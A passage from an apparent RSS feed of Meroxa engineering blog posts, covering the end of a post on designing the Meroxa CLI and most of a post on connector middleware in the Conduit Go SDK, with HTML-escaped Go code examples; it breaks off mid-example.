		wantInput &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ValueToConfirm&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cmd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Context&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

		reader &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; bufio&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewReader&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Stdin&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;To proceed, type %q or re-run this command with --force\n▸ &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; wantInput&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		input&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; reader&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ReadString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token char&quot;&gt;&apos;\n&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; wantInput &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; strings&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;TrimSuffix&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;input&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;\n&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
			&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; errors&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;New&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;action aborted&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Any command that implements the CommandWithConfirmWithValue interface would require that the given argument be provided a second time, unless the override flag is used. Example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;
&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;Remove&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;ValueToConfirm&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; context&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Context&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;wantInput &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;args&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;NameOrUUID
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;strong&gt;Documentation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Inline with what’s been mentioned on different occasions on this blog post is the need to automate as much as possible. Cobra’s framework provides the ability to &lt;a href=&quot;https://github.com/meroxa/cli/blob/master/Makefile#L26-L32&quot;&gt;generate documentation automatically,&lt;/a&gt;, and we do so in a specific format so it’s live in &lt;a href=&quot;https://docs.meroxa.com/&quot;&gt;our public documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;For every change we’re able to communicate externally, we consider presenting those in a &lt;a href=&quot;https://docs.meroxa.com/changelog/tags/cli&quot;&gt;changelog&lt;/a&gt; so our customers can keep up with announcements they might be interested in.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Keep your users using the latest&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The expectation of our Platform is that we’ll release new features often, and we need to make our customers aware of &lt;a href=&quot;https://docs.meroxa.com/changelog/2022-05-27-meroxa-cli-v-2-2-0&quot;&gt;this&lt;/a&gt; so they upgrade fast. At Meroxa, we accomplished this by presenting a warning if they haven’t upgraded within the last week:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell&quot;&gt;&lt;pre class=&quot;language-shell&quot;&gt;&lt;code class=&quot;language-shell&quot;&gt;
$ meroxa &lt;span class=&quot;token function&quot;&gt;whoami&lt;/span&gt; 
raul@meroxa.io
  🎁 meroxa v2.8.1 is available&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt; Update it by running: &lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;brew upgrade meroxa&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;&lt;/span&gt;
  🧐 Check out latest changes &lt;span class=&quot;token keyword&quot;&gt;in&lt;/span&gt; https://github.com/meroxa/cli/releases/tag/v2.8.1
  💡 To disable these warnings, run &lt;span class=&quot;token variable&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;meroxa config &lt;span class=&quot;token builtin class-name&quot;&gt;set&lt;/span&gt; &lt;span class=&quot;token assign-left variable&quot;&gt;DISABLE_NOTIFICATIONS_UPDATE&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;true&lt;span class=&quot;token variable&quot;&gt;`&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;&lt;strong&gt;Always aim for a good Developer Experience&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Above all the features we have considered adding to our CLI, there’s one bucket that is always high on our list, and this one is improving its User Experience, even if this implies adding support to other external tools.&lt;/p&gt;
&lt;p&gt;For example, we recently integrated with &lt;a href=&quot;https://fig.io/&quot;&gt;Fig&lt;/a&gt; and &lt;a href=&quot;https://www.warp.dev/&quot;&gt;Warp&lt;/a&gt; to improve autocomplete and resource workflows as mentioned in the following changelogs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/changelog/2022-08-18-meroxa-cli-and-fig/&quot;&gt;Fig&apos;s changelog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/changelog/2022-09-01-meroxa-cli-and-warp/&quot;&gt;Warp&apos;s changelog&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Developing a CLI is a very exciting journey. The speed of interacting programmatically with a Platform is difficult to beat when you’re using a terminal. With this blog post, I hope I gave you some ideas on how to approach your own CLI development. If that’s the case, I highly recommend giving this a read: &lt;a href=&quot;https://clig.dev/&quot;&gt;https://clig.dev/&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Have questions or want to chat about the process?, I’ll be happy to help on &lt;a href=&quot;https://discord.com/channels/828680256877363200/828680256877363206&quot;&gt;our Discord channel&lt;/a&gt;, or reach out via &lt;a href=&quot;mailto:support@meroxa.io&quot;&gt;support@meroxa.io&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Middleware for Conduit Connectors Improves Developer Experience]]></title><description><![CDATA[Connector Middleware improves the developer experience. You can utilize middleware provided by the SDK to enrich the functionality of connectors without reinventing the wheel.]]></description><link>https://meroxa.com/blog/middleware-for-conduit-connectors-improves-developer-experience</link><guid isPermaLink="false">https://meroxa.com/blog/middleware-for-conduit-connectors-improves-developer-experience</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 05 Oct 2022 14:47:21 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/conduitio/conduit&quot;&gt;Conduit&lt;/a&gt; v0.3.0 was recently released and brought lots of useful features that make the user as well as the developer experience nicer and simpler. One of these features is connector middleware in the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt;. In this blog post we will explain what middleware is, why we added it, how it solves our problems and how to use it yourself.&lt;/p&gt;
&lt;h2&gt;The problem we faced&lt;/h2&gt;
&lt;p&gt;Before we dive into middleware, let’s first give you some context around Conduit and the problem we faced.&lt;/p&gt;
&lt;p&gt;Conduit is a data integration tool that uses connectors to fetch data from and write data to third-party systems. A connector is a plugin that runs in its own process and follows the prescribed &lt;a href=&quot;https://github.com/conduitio/conduit-connector-protocol&quot;&gt;connector protocol&lt;/a&gt;. We use protocol buffers and gRPC to define the interface used in the connector protocol. On one hand, this gives us the flexibility to write connectors in any programming language, but on the other hand, it requires the connector developer to deal with the complexity of gRPC streams and write a lot of boilerplate code themselves. Because we want to make the developer experience better and standardize the behavior of connectors as much as possible we provide a &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;connector SDK&lt;/a&gt; for connectors written in Go. The SDK hides the complexity, implements common boilerplate code, provides utilities for implementing a connector, and allows the developer to focus on writing the connector functionality without worrying about the protocol.&lt;/p&gt;
&lt;p&gt;After implementing more than &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/connectors.md&quot;&gt;25 connectors&lt;/a&gt; it became clear that there was still room for improvement in terms of reducing duplicated code found in multiple connectors. We saw repeated code in some connectors that needed the same functionality, like rate limiting or batching. The problem we faced is that these features are not applicable for all connectors so we can’t bake them into the SDK and enable them for all connectors. Furthermore, even if connectors require the same functionality, they may expect different default values to configure the functionality (e.g. default batch size).&lt;/p&gt;
&lt;p&gt;To solve this problem, we came up with the following requirements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We want to be able to add features that are needed across all connectors (e.g. batching).&lt;/li&gt;
&lt;li&gt;These added features need to be configurable by the end-user.&lt;/li&gt;
&lt;li&gt;Connector developers should be in control of adding or opting out of a feature in their connector (no hidden logic).&lt;/li&gt;
&lt;li&gt;There should be a default set of features, so we can add more in the future and easily roll them out to all connectors.&lt;/li&gt;
&lt;li&gt;Connector developers should be able to choose the defaults for these features in their connector.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Fulfilling these requirements will bring many benefits - it would further standardize the behavior of connectors, cut down on code duplication, and in the long run, it will help us reduce the number of bugs and making it easier to maintain our connectors.&lt;/p&gt;
&lt;h2&gt;Middleware&lt;/h2&gt;
&lt;p&gt;As soon as we had a clear list of requirements a lightbulb went off in our heads - we need to introduce a middleware!&lt;/p&gt;
&lt;p&gt;What is middleware, you ask? Different people understand different things under the term. Some may think of OS middleware that expands the functionality of an operating system, others might think of middleware as services in the context of distributed applications. Regardless of the specific middleware you think of, one thing is true for all: as the name suggests, it’s a piece of software that sits &lt;em&gt;in the middle&lt;/em&gt; of two components and provides additional functionality. You can imagine middleware like augmented reality glasses - they allow the wearer to see and interact with their environment as before while providing additional information on top.&lt;/p&gt;
&lt;p&gt;In this post we use the term middleware to describe a piece of code that functions like a wrapper around an object and forwards calls to the underlying object while manipulating the parameters and/or return values. It’s common that the underlying object implements a certain interface so that the middleware does not have to be aware of what specific object it is wrapping. The middleware in turn also implements the same interface, so that a wrapped object can still be used through that interface.&lt;/p&gt;
&lt;p&gt;Perhaps the most common use of the middleware pattern in Go are HTTP handlers. It’s common practice to wrap &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt; objects with middleware that adds functionality like logging or authentication. Here’s an example of HTTP middleware in Go:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;log&quot;&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;net/http&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;loggingMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;next http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Handler&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Handler &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;HandlerFunc&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;w http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResponseWriter&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Request&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;received request&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		next&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ServeHTTP&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;w&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Print&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;send response&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;hello&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;w http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;ResponseWriter&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; r &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Request&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	w&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;byte&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;hello&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	handler &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;HandlerFunc&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;hello&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; http&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ListenAndServe&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;:8080&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;loggingMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;handler&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Fatal&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice that &lt;code class=&quot;language-text&quot;&gt;loggingMiddleware&lt;/code&gt; is unaware of what &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt; it is wrapping. Since the middleware itself is an &lt;code class=&quot;language-text&quot;&gt;http.Handler&lt;/code&gt; it can even wrap another middleware (chaining middleware is also common practice). The base functionality of the HTTP handler is still the same, the middleware forwards the call while executing some operations before and after.&lt;/p&gt;
&lt;h2&gt;How Connector Middleware solves our problem&lt;/h2&gt;
&lt;p&gt;The middleware pattern checks all the boxes of our requirements list. Let’s go through them one by one.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We want to be able to add features that are needed across all connectors.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is exactly what middleware does; it adds additional functionality without changing the basic functionality. It can be applied to any object that implements a certain interface, in our case the interfaces are &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Source&quot;&gt;Source&lt;/a&gt; and &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Destination&quot;&gt;Destination&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;These added features need to be configurable by the end-user.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Source&quot;&gt;Source&lt;/a&gt; and &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Destination&quot;&gt;Destination&lt;/a&gt; interfaces are in control of defining how the connector can be configured. The middleware can wrap the function &lt;code class=&quot;language-text&quot;&gt;Parameters&lt;/code&gt; to adjust the specifications and tell the UI to display additional parameters. When the user creates the connector, the configuration is passed to the function &lt;code class=&quot;language-text&quot;&gt;Config&lt;/code&gt;, which can again be wrapped by the middleware to parse the injected parameters.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Connector developers should be in control of adding or opting out of a feature in their connector.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were already using a constructor function in our connectors which is the perfect place for adding middleware. The constructor is implemented by the connector developer so they can choose to add any middleware they want. Note that we encourage developers to add at least the default middleware unless they have a good reason not to do so.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;There should be a default set of features, so we can add more in the future and easily roll them out to all connectors.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The SDK provides functions that return the default connector middleware (&lt;code class=&quot;language-text&quot;&gt;DefaultSourceMiddleware&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;DefaultDestinationMiddleware&lt;/code&gt;). Developers are encouraged to add the default middleware to their connectors unless they have a good reason not to do so. All connectors that will use the default middleware will automatically benefit from new middleware that gets added in future SDK releases. This will ensure that we can further standardize the behavior of our connectors and easily roll out common features.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Connector developers should be able to choose the defaults for these features in their connector.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We solved this by implementing middleware as structs with public fields that contain the default values for the parameters it introduces. The connector developer can choose the default values when adding middleware to their connector.&lt;/p&gt;
&lt;h2&gt;Example usage&lt;/h2&gt;
&lt;p&gt;Here we will show how easy it is to apply middleware on connectors. We will focus on the &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Destination&quot;&gt;Destination&lt;/a&gt;, although the same principles apply when implementing a &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#Source&quot;&gt;Source&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We start with a simple destination struct and a constructor function.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Destination &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;UnimplementedDestination
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NewDestination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Destination &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// return an instance of Destination&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To add the middleware to the destination the SDK provides a utility function called &lt;code class=&quot;language-text&quot;&gt;DestinationWithMiddleware&lt;/code&gt;. The SDK also provides the function &lt;code class=&quot;language-text&quot;&gt;DefaultDestinationMiddleware&lt;/code&gt; which returns a set of default middleware and should be used in most connectors. In future SDK releases we may add more middleware to the set, this way most connectors will benefit from new middleware simply by updating the SDK version.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Destination &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;UnimplementedDestination
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NewDestination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Destination &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// return an instance of Destination wrapped in the default middleware&lt;/span&gt;
	destination &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;Destination&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	middleware &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;DefaultDestinationMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;DestinationWithMiddleware&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;destination&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; middleware&lt;span class=&quot;token operator&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;If there is a good reason not to use the default middleware (e.g. choose different defaults or remove a middleware) the developer can freely choose which middleware to apply. For example, this is how we would apply only the batching middleware and set a default batch size of 100.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Destination &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;UnimplementedDestination
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;NewDestination&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; sdk&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Destination &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token comment&quot;&gt;// return an instance of Destination wrapped in custom middleware&lt;/span&gt;
